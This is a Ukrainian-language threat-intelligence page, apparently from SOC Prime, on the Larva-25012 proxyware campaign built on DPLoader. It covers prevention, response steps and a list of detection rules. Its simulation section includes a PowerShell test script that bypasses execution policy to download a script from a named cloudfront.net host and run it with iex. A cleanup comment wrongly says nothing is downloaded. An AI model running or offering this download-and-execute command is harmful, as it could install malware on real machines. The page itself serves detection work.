SOC Prime Bias: Medium

23 Sep 2026 08:04 UTC

Larva-25012: Кампанія з поширення Proxyware 2026 року

Author Photo
SOC Prime Team linkedin icon Стежити
Larva-25012: Кампанія з поширення Proxyware 2026 року
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисник Larva-25012 активно поширює Proxyware для монетизації скомпрометованих систем шляхом викрадення інтернет-ширини користувачів. Кампанія базується на існуючих інфекціях DPLoader і використовує кілька каналів поширення, включаючи сайти завантаження YouTube і GitHub. Шкідливе ПЗ розгортає кілька сімей Proxyware, включаючи DigitalPulse, SOAX, Appsalt і IPRoyal.

Розслідування

AhnLab Security Intelligence Center (ASEC) відстежував поточну активність proxyjacking та ідентифікував відновлення операцій Larva-25012 у другій половині 2026 року. Розслідування виявило, що нападники використовують як JavaScript, так і Python варіанти DPLoader для підтримки стійкості та виконання команд PowerShell. Також створюються заплановані завдання, щоб забезпечити продовження роботи шкідливих скриптів на скомпрометованих системах.

Запобіжні заходи

Користувачам слід уникати завантаження виконуваних файлів з підозрілих вебсайтів, рекламних повідомлень чи неофіційних платформ обміну файлами. Програмне забезпечення слід отримувати лише з надійних та легітимних джерел, тоді як слід уникати піратських застосунків та нелегальних сайтів завантаження. Організації також повинні зберігати рішення для захисту кінцевих точок, включаючи V3, повністю оновленими.

Реагування

Коли виявляється підозріла активність, адміністратори повинні ідентифікувати та завершити шкідливі процеси PowerShell та заплановані завдання, пов’язані з ураженими сім’ями Proxyware. Системи також слід перевірити на наявність DPLoader, який слугує ключовим компонентом інфекції та стійкості. Перевірте вихідний мережевий трафік на предмет несанкціонованих з’єднань з відомою або підозрілою інфраструктурою C2.

Послідовність атаки

Ми все ще оновлюємо цю частину.

Виявлення

Завантаження або Вивантаження через Powershell (через cmdline)

Команда SOC Prime
22 вересня 2026

Підозрілі дочірні процеси NodeJS [Windows] (через cmdline)

Команда SOC Prime
22 вересня 2026

Відключення Моніторингу в реальному часі Windows Defender та Зміни Інших Налаштувань (через cmdline)

Команда SOC Prime
22 вересня 2026

Виклик Підозрілих Методів .NET з Powershell (через powershell)

Команда SOC Prime
22 вересня 2026

Можливе Зловживання Доменом Розробки Cloudflare (через dns)

Команда SOC Prime
22 вересня 2026

IoC (HashMd5) для виявлення: Larva-25012: Кампанія поширення Proxyware у 2026 році

Правила SOC Prime AI
22 вересня 2026

Виявлення Скриптів Інсталяції Proxyware через PowerShell [Windows Powershell]

Правила SOC Prime AI
22 вересня 2026

Виконання Симуляції

  • Оповідь нападу & Команди: Противник, намагаючись встановити proxyware для несанкціонованого використання ширини каналу (Larva-25012), виконує одноразовий PowerShell скрипт. Мета – обійти локальне сканування файлів, завантажуючи корисне навантаження безпосередньо у пам’ять. Вони використовують опцію -ExecutionPolicy Bypass щоб забезпечити виконання скрипта та iwr щоб отримати файл з розподілу Cloudfront, передаючи його до iex для негайного виконання. Ця конкретна командна лінія є однією з цільових сигнатур у правилі виявлення.

  • Сценарій для Тестування Регресії:

    # Симуляція Інсталяції Proxyware Larva-25012
    # Ця команда спеціально розроблена для відповідності селекції2 у правилі виявлення.
    
    $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"'
    
    # Ми використовуємо Start-Process, щоб забезпечити захоплення командного рядка як нове подія процесу
    Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`""
  • Команди для Очищення:

    # Файли фактично не завантажуються через природу 'iex' труби у симуляції, 
    # але якщо якісь артефакти були створені, вони будуть видалені тут.
    Write-Host "Очищення симуляції завершено. Постійні артефакти не створені."